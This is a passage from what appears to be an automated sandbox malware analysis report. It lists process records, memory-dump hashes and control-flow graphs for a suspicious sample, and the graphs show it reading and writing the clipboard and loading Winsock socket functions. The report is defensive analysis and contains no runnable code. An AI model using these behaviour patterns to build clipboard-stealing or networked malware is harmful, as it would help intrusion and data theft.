                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:31
                                                                                                                                                      Start time:07:58:53
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                      Imagebase:0x7ff72c440000
                                                                                                                                                      File size:827'408 bytes
                                                                                                                                                      MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:33
                                                                                                                                                      Start time:07:58:57
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 6432 -s 140
                                                                                                                                                      Imagebase:0x7ff679c70000
                                                                                                                                                      File size:570'736 bytes
                                                                                                                                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:34
                                                                                                                                                      Start time:07:59:11
                                                                                                                                                      Start date:04/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6740 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8
                                                                                                                                                      Imagebase:0x7ff67dcd0000
                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                      MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:false

                                                                                                                                                      Reset < >
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1773677906.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b7f0000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                                                                                        • Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
                                                                                                                                                        • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                                                                                        • Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2055723918.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a73a21c3248a198af1e89a2b13eb8794bbde26503cfb4fc4cfb7fcdcadaf0afc
                                                                                                                                                        • Instruction ID: 347eb46863d0610c54c5e9c05e70889870b2352b4ba84a369cc0dc72dc0b729b
                                                                                                                                                        • Opcode Fuzzy Hash: a73a21c3248a198af1e89a2b13eb8794bbde26503cfb4fc4cfb7fcdcadaf0afc
                                                                                                                                                        • Instruction Fuzzy Hash: 6D01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10056DE58AC36A1DA32E882CB41
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2055723918.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: 5N_^
                                                                                                                                                        • API String ID: 0-759515693
                                                                                                                                                        • Opcode ID: 89ccfa8d21d19d88acb68f1eb5e7c6236041c84e643cb67cc8674189df9c60c8
                                                                                                                                                        • Instruction ID: 5f5f208cf7bbdc70b39fce277f84a5ae9ba83f7ddabee3b8ef9b235c64e5a6fd
                                                                                                                                                        • Opcode Fuzzy Hash: 89ccfa8d21d19d88acb68f1eb5e7c6236041c84e643cb67cc8674189df9c60c8
                                                                                                                                                        • Instruction Fuzzy Hash: DF717567E0FBDA4BE36392AD18B64D13F90DF5226870E01F7C4C55F4B3AD18291A8762

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:0%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                        Signature Coverage:4%
                                                                                                                                                        Total number of Nodes:50
                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                        execution_graph 30291 48c250 ExitProcess 30295 40de70 26 API calls 30200 424870 OpenClipboard GetClipboardData GetClipboardData GetClipboardData CloseClipboard 30299 417273 28 API calls 30304 4c9670 GetCurrentThreadId GetKeyboardLayout GetLocaleInfoA 30203 4dc870 EnterCriticalSection LeaveCriticalSection 30206 4d8000 EndDoc 30310 40d210 46 API calls 30209 4fc810 InitializeCriticalSection 30316 408220 14 API calls 30212 401031 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 30213 41d430 56 API calls 30325 4012c0 16 API calls 30328 40fad0 26 API calls 30218 4118d0 7 API calls 30220 4144de 34 API calls 30332 4086e0 19 API calls 30221 41d8e0 37 API calls 30222 4210e0 InterlockedCompareExchange Sleep InterlockedCompareExchange InterlockedExchange 30333 41bee8 19 API calls 30338 41eaf8 GetSystemTime GetTimeZoneInformation GetSystemTime SystemTimeToFileTime 30341 411a80 27 API calls 30342 40c290 QueryPerformanceCounter QueryPerformanceCounter 30343 40ea95 28 API calls 30238 401ca0 278 API calls 30241 4160b1 56 API calls 30243 41b4b0 48 API calls 30349 4f9340 CoCreateInstance 30250 40d560 31 API calls 30354 417f61 29 API calls 30251 41e560 GetSystemTime GetTimeZoneInformation 30252 401170 12 API calls 30360 50af60 CoTaskMemAlloc 30366 41630b 26 API calls 30188 4dc300 GetCommandLineA 30189 42c310 30188->30189 30257 40fd10 41 API calls 30368 41f710 16 API calls 30185 44a710 30186 44a712 ExitProcess 30185->30186 30260 40d530 25 API calls 30261 40cdc0 19 API calls 30263 4235c0 GetACP GetCPInfo 30381 4ddfc0 64 API calls 30265 40d1d0 24 API calls 30269 41cde0 38 API calls 30270 4d25e0 SetTextCharacterExtra SelectObject 30386 408bf1 16 API calls 30389 4dd780 46 API calls 30396 4213a0 17 API calls

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 0 44a710-44a719 2 44a729 0->2 3 44a71b-44a727 0->3 4 44a73a-44a748 ExitProcess 2->4 3->4
                                                                                                                                                        APIs
                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 0044A748
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 621844428-399585960
                                                                                                                                                        • Opcode ID: 293620465462d170643fb551289f4f82b8ddd7fd95f4a21ffe41ffa866c1d984
                                                                                                                                                        • Instruction ID: 4153d7d145e48ef0bfada68ad49838f97c765877aadb4e058581a2a78d09dbec
                                                                                                                                                        • Opcode Fuzzy Hash: 293620465462d170643fb551289f4f82b8ddd7fd95f4a21ffe41ffa866c1d984
                                                                                                                                                        • Instruction Fuzzy Hash: E7E04F75E4A25CCEEB30CA56EC017B8B775EB94316F0040EBD54D96241C6344D958F56

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 5 44a6e0-44a6fa 6 44a6fc-44a706 5->6 7 44a708 5->7 8 44a712-44a719 6->8 7->8 9 44a729 8->9 10 44a71b-44a727 8->10 11 44a73a-44a748 ExitProcess 9->11 10->11
                                                                                                                                                        APIs
                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 0044A748
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                        • Opcode ID: 301b0aacc8fca0e78445999e19763b72f532b71fd961c991c7f3581a4234fff3
                                                                                                                                                        • Instruction ID: 1ceb8dd2f8bb3b7ec6cf47d3eabd97270618131fd29c238ba72ea5f4f3f95bef
                                                                                                                                                        • Opcode Fuzzy Hash: 301b0aacc8fca0e78445999e19763b72f532b71fd961c991c7f3581a4234fff3
                                                                                                                                                        • Instruction Fuzzy Hash: 79F01C7494622DCEEF308F61C8457ACB7B0BB04315F1082EAC46D67780C3348E829F86

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 12 4dc300-4dc310 GetCommandLineA call 42c310
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CommandLine
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3253501508-0
                                                                                                                                                        • Opcode ID: 04003b1c6e78a75645abe312a21659dec6fb72e0dd25253600e7555adc4d96f0
                                                                                                                                                        • Instruction ID: 324ae4de550c7ee1837b525cc46cc1c53208b04041f71095fcaff5b360da8b69
                                                                                                                                                        • Opcode Fuzzy Hash: 04003b1c6e78a75645abe312a21659dec6fb72e0dd25253600e7555adc4d96f0
                                                                                                                                                        • Instruction Fuzzy Hash: 51B012788003A00E83717B3834455CE7FF50C1D2E43844A58FCC1A3315D61488975AFA

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 14 4d7960-4d796e 15 4d7977-4d797a 14->15 16 4d7970-4d7976 14->16 17 4d797c-4d7984 15->17 18 4d7985-4d7995 LoadLibraryA 15->18 19 4d7ad8-4d7aeb 18->19 20 4d799b-4d7aac GetProcAddress * 19 18->20 20->19 22 4d7aae-4d7ab5 20->22 23 4d7ab7-4d7ab9 22->23 24 4d7ad2 22->24 23->24 25 4d7abb-4d7ad1 23->25 24->19
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: WSAAsyncGetHostByName$WSAAsyncSelect$WSACancelAsyncRequest$WSACleanup$WSAGetLastError$WSAStartup$WSOCK32.DLL$accept$bind$closesocket$connect$htonl$htons$inet_addr$listen$recv$recvfrom$send$sendto$socket
                                                                                                                                                        • API String ID: 0-3677570488
                                                                                                                                                        • Opcode ID: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                        • Instruction ID: 8c9ac86f1f98df4bb1f2f2f05f7a43d8bd4a8589446ea9a4d4fdb8b68f6288ad
                                                                                                                                                        • Opcode Fuzzy Hash: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                        • Instruction Fuzzy Hash: 5031DE71D523646AD7206BB9EC19DEF3EACFBB6704B510517F000972A0EAF88458AF94

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 689 4d9ab0-4d9ab7 690 4d9abd-4d9ac0 689->690 691 4d9c1c-4d9c1d 689->691 690->691 692 4d9ac6-4d9ad4 690->692 693 4d9ada-4d9aeb call 4b8000 692->693 694 4d9ba3-4d9ba5 692->694 699 4d9c19-4d9c1b 693->699 701 4d9af1-4d9b14 call 421380 GlobalAlloc 693->701 695 4d9ba8-4d9bad 694->695 695->695 697 4d9baf-4d9bc2 GlobalAlloc 695->697 697->699 700 4d9bc4-4d9bcb GlobalLock 697->700 699->691 702 4d9bd0-4d9bd8 700->702 706 4d9b2e-4d9b3f call 52b380 701->706 707 4d9b16-4d9b28 GlobalLock call 4b81c0 GlobalUnlock 701->707 702->702 704 4d9bda-4d9bdb GlobalUnlock 702->704 708 4d9be1-4d9be3 704->708 716 4d9b41-4d9b6b WideCharToMultiByte GlobalAlloc 706->716 717 4d9b90-4d9ba1 call 439d00 706->717 707->706 711 4d9be9-4d9bf3 OpenClipboard 708->711 712 4d9be5-4d9be7 708->712 711->699 715 4d9bf5-4d9c03 EmptyClipboard 711->715 712->699 712->711 718 4d9c0a-4d9c0c 715->718 719 4d9c05-4d9c08 SetClipboardData 715->719 720 4d9b6d-4d9b70 GlobalLock 716->720 721 4d9b87-4d9b8d call 439d00 716->721 717->708 722 4d9c0e-4d9c11 SetClipboardData 718->722 723 4d9c13 CloseClipboard 718->723 719->718 725 4d9b76-4d9b7e 720->725 721->717 722->723 723->699 725->725 728 4d9b80-4d9b81 GlobalUnlock 725->728 728->721
                                                                                                                                                        APIs
                                                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000002), ref: 004D9B06
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004D9B17
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004D9B28
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,00000000), ref: 004D9B51
                                                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000001), ref: 004D9B61
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004D9B70
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004D9B81
                                                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000003,?,?,?,00000000,0040D599,00000000,00000000), ref: 004D9BB8
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004D9BC5
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004D9BDB
                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 004D9BEB
                                                                                                                                                        • EmptyClipboard.USER32 ref: 004D9BF5
                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004D9C08
                                                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 004D9C11
                                                                                                                                                        • CloseClipboard.USER32 ref: 004D9C13
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Global$Clipboard$AllocLockUnlock$Data$ByteCharCloseEmptyMultiOpenWide
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3392129136-0
                                                                                                                                                        • Opcode ID: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                        • Instruction ID: e40826f6a6b6de4095afa5ba746f594757548e465f4129e7c784a6b23cc7d310
                                                                                                                                                        • Opcode Fuzzy Hash: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                        • Instruction Fuzzy Hash: 7A41F371104302ABE3111B61BC99B277BFCAFA1B04F09041BF986D7341DA69EC09D7BA
                                                                                                                                                        APIs
                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 004D9C27
                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 004D9C3A
                                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 004D9C42
                                                                                                                                                        • GetClipboardData.USER32(00000000), ref: 004D9C4B
                                                                                                                                                        • CloseClipboard.USER32 ref: 004D9C56
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
